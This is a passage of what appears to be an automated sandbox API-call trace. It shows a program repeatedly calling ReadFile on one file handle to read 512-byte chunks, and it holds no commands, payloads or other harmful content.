lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, 
lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: 
lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, 
lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.168] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.169] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, 
lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.170] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile 
(in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.171] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 
[0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, 
lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.172] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, 
lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.173] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: 
lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.174] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, 